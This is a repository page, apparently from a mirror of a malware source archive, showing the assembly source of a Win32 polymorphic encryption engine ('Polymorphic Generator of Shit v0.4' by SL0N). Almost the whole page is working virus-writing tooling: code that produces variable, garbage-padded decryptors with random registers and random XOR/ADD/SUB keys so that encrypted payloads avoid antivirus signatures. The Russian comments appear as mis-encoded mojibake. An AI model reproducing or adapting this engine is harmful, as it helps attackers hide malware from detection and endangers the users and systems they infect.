daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity
Files
0de05d289a6dbd7c210418e09b2fedced548c87e
MalwareSourceCode/Libs/Win32/Cryptor/VirTool.Win32.Cryptor.Pgs.asm
T
TheDuchy d44d9b59a7 Folder structure change, added README
2020-10-16 22:28:58 +02:00

335 lines
16 KiB
NASM
Raw Blame History

;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; [POLYMORPHIC GENERATOR OF SHIT V. 0.4] ;
; ;
; ######### ######## ######## ;
; ########### ########## ########## ;
; ##### ###### ###### ## ###### ## ;
; ##### ##### ##### ##### ;
; ##### ##### ##### ######## ;
; ########### ##### ###### ######## ;
; ######### ##### ###### ##### ;
; ##### ##### ### ##### ;
; ##### ########### ########### ;
; ##### ##### ### ######### ;
; ;
; FOR MS WINDOWS ;
; ;
; BY SL0N ;
;------------------------------------------------------------------------------;
; MANUAL: ;
; BUFFER FOR ENCRYPTED CODE + DECRYPTORS -> EDI ;
; START OF CODE -> EAX ;
; SIZE OF CODE -> ECX ;
; ;
; CALL MORPH ;
; ;
; SIZE OF ENCRYPTED CODE + DECRYPTORS -> ECX ;
; BUFFER WITH ENCRYPTED CODE + DECRYPTORS -> EDI ;
;------------------------------------------------------------------------------;
; (+) DO NOT USE WIN API ;
; (+) EASY TO USE ;
; (+) GENERATE GARBAGE INSTRUCTIONS (1,2,3,4,5,6 BYTES) ;
; (+) USE DELTA OFFSET ;
; (+) USE X87 INSTRUCTIONS ;
; (+) IT CREATES VARIABLE DECRYPTOR SIZE ;
; (+) RANDOMLY CHANGE REGISTERS IN INSTRUCTIONS ;
; (+) RANDOM 32 BIT ENCRYPTION ALGORITHM (ADD/SUB/XOR) ;
; (+) RANDOM NUMBER OF DECRYPTORS ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
morph:
push esi ebp ; Ñîõðàíÿåì ðåãèñòðû
call delta0 ;
delta0: ; Âû÷èñëÿåì
pop ebp ; äåëüòà ñìåùåíèå
sub ebp,offset delta0 ;
push eax ; Êëàä¸ì â ñòýê eax
decr_number:
mov eax,40 ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî
call brandom32 ; â äèàïàçîíå 0..30
test eax,eax ; Åñëè ÷èñëî ðàâíî 0, òî îíî
jz decr_number ; íàì íå ïîäõîäèò
mov ebx,eax ; Ïîìåùàåì ÷èñëî â ebx
pop eax ; Âîññòàíàâëèâàåì eax
multi_decr:
mov edx,edi
call polym ;
mov eax,edx ;
add edi,ecx ; Ãåíåðèðóåì ñòîëüêî
dec ebx ; äåêðèïòîðîâ, ñêîëüêî
test ebx,ebx ; çàïèñàíî â ðåãèñòðå ebx
jnz multi_decr ;
sub edi,ecx ; ðåçóëüòàòàìè
pop ebp esi ; Âîññòàíàâëèâàåì ðåãèñòðû
ret ; Âîçâðàò èç ïîäïðîãðàììû
;------------------------------------------------------------------------------;
polym:
push ebp edi esi ebx ; Ñîõðàíÿåì ðåãèñòðû
mov [ebp+sz_code],ecx ; Çàíîñèì ïàðàìåòðû ñòàðòà
mov [ebp+begin_code],eax ; èç ðåãèñòðîâ â ïåðåìåííûå
mov [ebp+buff],edx ;
mov edi,edx ;
;------------------------------------------------------------------------------;
call len_gen ; Âûçûâàåì ãåíåðàòîð äëèí
mov [ebp+sz_decr],40
add [ebp+sz_decr],ecx ; äîáàâëÿåì äëèíû ìóñîðà ê
; ðàçìåðó äåêðèïòîðà
call reg_mutate ; Âûáèðàåì ðåãèñòðû, êîòîðûå
; áóäóò èñïîëüçîâàòüñÿ â
; äåêðèïòîðå
mov ecx,[ebp+len+0] ; È ãåíåðèðóåì ïåðâóþ ïàðòèþ
call garbage ; ìóñîðíûõ èíñòðóêöèé
mov al,0e8h ; Ãåíåðèðóåì ñëåäóþùóþ
stosb ; èíñòðóêöèþ: call $+5
xor eax,eax ;
stosd ;
mov ecx,[ebp+len+4] ; Ãåíåðèðóåì íîâóþ ïàðòèþ
call garbage ; ìóñîðíûõ èíñòðóêöèé
mov al,58h ; Ãåíåðèðóåì ñëåäóþùóþ
add al,bh ; èíñòðóêöèþ äåêðèïòîðà:
stosb ; pop reg1
mov ecx,[ebp+len+8] ; Ãåíåðèðóåì ìóñîðíûå
call garbage ; èíñòðóêöèè
; Ãåíåðèðóåì ñëåäóþùóþ
mov al,81h ; èíñòðóêöèþ äåêðèïòîðà:
stosb ; add reg1,sz_decr-len[0]
mov al,0c0h ;
add al,bh ; Òàêèì îáðàçîì reg1 áóäåò
stosb ; óêàçûâàòü íà íà÷àëî
; çàêðèïòîâàííîãî êîäà
mov eax,[ebp+sz_decr] ;
sub eax,[ebp+len] ;
sub eax,9 ;
stosd ;
mov ecx,[ebp+len+12] ; Ãåíåðèðóåì ìóñîðíûå
call garbage ; èíñòðóêöèè
mov al,8bh ; Ãåíåðèðóåì èíñòðóêöèþ:
stosb ; mov reg2,reg1
;
mov al,bl ; Ó íàñ reg2 ïîçæå áóäåò
shl al,3 ; èñïîëüçîâàòüñÿ äëÿ
add al,0c0h ; ñðàâíåíèÿ
add al,bh ;
stosb
mov ecx,[ebp+len+16] ; Ãåíåðèðóåì ìóñîðíûå
call garbage ; èíñòðóêöèè
mov al,81h ;
stosb ;
mov al,0c0h ;
add al,bl ;
stosb ;
; Ãåíåðèðóåì èíñòðóêöèþ:
mov eax,[ebp+sz_code] ; add reg2,size_code
inc eax
stosd ;
mov ecx,[ebp+len+20] ; Ãåíåðèðóåì ìóñîðíûå
call garbage ; èíñòðóêöèè
mov al,81h ;
stosb ; Ãåíåðèðóåì ñëåäóþùóþ
mov al,0c0h ; èíñòðóêöèþ: add reg1,4
add al,bh ;
stosb ;
;
mov eax,4 ;
stosd ;
mov ecx,[ebp+len+24] ; Ãåíåðèðóåì ñëåäóþùóþ
call garbage ; ïàðòèþ ìóñîðà
call random32 ;
mov [ebp+key2],eax ; Ñîõðàíÿåì êëþ÷ êðèïòîâàíèÿ
lea eax,[ebp+next] ; Êëàä¸ì â ñòýê ñìåùåíèå
push eax ; íà ìåòêó next
; Âûáèðàåì îäèí èç òð¸õ
; âàðèàíòîâ êðèïòîâàíèÿ
mov eax,3 ; ñëó÷àéíûì îáðàçîì.
call brandom32 ;
; Àëãîðèòìû êðèïòîâàíèÿ è
cmp al,1 ; äåêðèïòîâàíèÿ:
je enc_add32 ;
; 1) XOR
cmp al,2 ; 2) ADD
je enc_sub32 ; 3) SUB
enc_xor32:
mov al,81h ;
stosb ; Ãåíåðèðóåì èíñòðóêöèþ:
mov al,30h ; xor [reg1],key_decrypt
add al,bh ;
stosb ;
mov eax,[ebp+key2]
stosd
push edi ;
lea edi,[ebp+crypt_n] ;
mov al,33h ; À â ñàìîì äâèæêå ìåíÿåòñÿ
stosb ; àëãîðèòì êðèïòîâàíèÿ
pop edi ;
ret ; Ïåðåõîä íà ìåòêó next
enc_add32:
mov al,81h ;
stosb ; Ãåíåðèðóåì èíñòðóêöèþ:
mov al,bh ; add [reg1],key_decrypt
stosb ;
mov eax,[ebp+key2]
stosd
push edi ;
lea edi,[ebp+crypt_n] ;
mov al,2bh ; À â ñàìîì äâèæêå ìåíÿåòñÿ
stosb ; àëãîðèòì êðèïòîâàíèÿ
pop edi ;
ret ; Ïåðåõîä íà ìåòêó next
enc_sub32:
mov al,81h ;
stosb ; Ãåíåðèðóåì ñëåäóþùóþ
mov al,028h ; èíñòðóêöèþ:
add al,bh ; sub [reg1],key_decrypt
stosb ;
mov eax,[ebp+key2]
stosd
push edi ;
lea edi,[ebp+crypt_n] ; À â ñàìîì äâèæêå ìåíÿåì
mov al,03h ; àëãîðèòì êðèïòîâàíèÿ
stosb ;
pop edi ;
ret ; Ïåðåõîä íà ìåòêó next
;------------------------------------------------------------------------------;
next:
mov ecx,[ebp+len+28] ; Ãåíåðèðóåì î÷åðåäíóþ
call garbage ; ïàðòèþ ìóñîðà
mov al,3bh ;
stosb ;
;
xor eax,eax ;
mov al,bh ; Ãåíåðèðóåì èíñòðóêöèþ:
shl al,3 ; cmp reg1,reg2
add al,0c0h ;
add al,bl ;
stosb ;
;------------------------------------------------------------------------------;
mov ax,820fh ;
stosw ;
xor eax,eax ;
dec eax ; Ãåíåðèðóåì èíñòðóêöèþ:
mov ecx,7*4 ; jb decrypt
sub eax,[ebp+len+ecx] ;
mov ecx,6*4 ;
sub eax,[ebp+len+ecx] ;
sub eax,19 ;
stosd ;
mov ecx,[ebp+len+32] ; Ãåíåðèðóåì ìóñîðíûå
call garbage ; èíñòðóêöèè
;------------------------------------------------------------------------------;
mov ecx,[ebp+sz_code] ;
mov esi,[ebp+begin_code] ;
add ecx,esi ;
encrypt: ;
lodsd ; Êðèïòóåì âåñü êîä êëþ÷îì
crypt_n: ; è íóæíûì àëãîðèòìîì
xor eax,[ebp+key2] ;
stosd ;
cmp esi,ecx ;
jl encrypt ;
mov edx,[ebp+buff] ; Çàïîëíÿåì ðåãèñòðû
mov ecx,[ebp+sz_code] ; ðåçóëüòàòàìè
add ecx,[ebp+sz_decr] ;
pop ebx esi edi ebp ; Âîñòàíàâëèâàåì ðåãèñòðû
ret ; È âûõîäèì èç ïðîöåäóðû
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; GARBAGE LENGTH GENERATOR SUBROUTINE ;
;------------------------------------------------------------------------------;
; [ IN ] ;
; ;
; NO INPUT IN SUBROTINE ;
;------------------------------------------------------------------------------;
; [ OUT ] ;
; ;
; LENGTH OF ALL GARBAGE -> ECX ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
len_gen: ; Ïîäïðîãðàììà ãåíåðàöèè
; äëèí äëÿ ìóñîðíûõ
; èíñòðóêöèé
xor ecx,ecx ; Îáíóëÿåì esi è ecx
xor esi,esi ;
loop1: ;
mov eax,100 ;
call brandom32 ; Íà÷èíàåì ãåíåðàöèþ
; äëèí, êàæäîå ÷èñëî
mov [ebp+len+esi],eax ; äèàïàçîíå 0..100
add ecx,eax ;
add esi,4 ;
cmp esi,36 ;
jne loop1 ;
ret ; Âîçâðàò èç ïîäïðîãðàììû
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; REGISTER MUTATOR SUBROUTINE ;
;------------------------------------------------------------------------------;
; [ IN ] ;
; ;
; NO INPUT IN SUBROTINE ;
;------------------------------------------------------------------------------;
; [ OUT ] ;
; ;
; USES REGISTER N1 -> BH (0..7) ;
; USES REGISTER N2 -> BL (0..7) ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
reg_mutate:
; Ïîäïðîãðàììà ãåíåðàöèè
generate1: ; ðåãèñòðîâ äëÿ äåêðèïòîðà
mov eax,8 ; Ïîëó÷àåì ñëó÷àéíîå ÷èñëî
call brandom32 ; â äèàïàçîíå 0..7
cmp al,00000100b ; Èñïîëüçóåì âñå ðåãèñòðû
je generate1 ; êðîìå esp
cmp al,00000101b ; Èñïîëüçóåì âñå ðåãèñòðû
je generate1 ; êðîìå ebp
mov bh,al ; Ñîõðàíÿåì ïîëó÷åííûé
; ðåãèñòð
generate2:
mov eax,8 ; Ïîëó÷àåì ñëó÷àéíîå ÷èñëî
call brandom32 ; â äèàïàçîíå 0..7
cmp al,bh ; Íå äîëæíî áûòü äâóõ
je generate2 ; èäåíòè÷íûõ ðåãèñòðîâ
cmp al,00000100b ; Èñïîëüçóåì âñå ðåãèñòðû
je generate2 ; êðîìå esp
mov bl,al ; Ñîõðàíÿåì ïîëó÷åííûé
; ðåãèñòð
ret ; Âîçâðàò èç ïîäïðîãðàììû
;------------------------------------------------------------------------------;
sz_decr dd 0 ;
begin_code dd 0 ; Äàííûå íåîáõîäèìûå äëÿ
st_code dd 0 ; êîððåêòíîé ðàáîòû
sz_code dd 0 ; ãåíåðàòîðà
buff dd 0 ;
key2 dd 0 ;
;------------------------------------------------------------------------------;
len dd 0,0,0,0,0,0,0,0,0 ; Ìåñòî äëÿ õðàíåíèÿ äëèí
;------------------------------------------------------------------------------;
Reference in New Issue View Git Blame Copy Permalink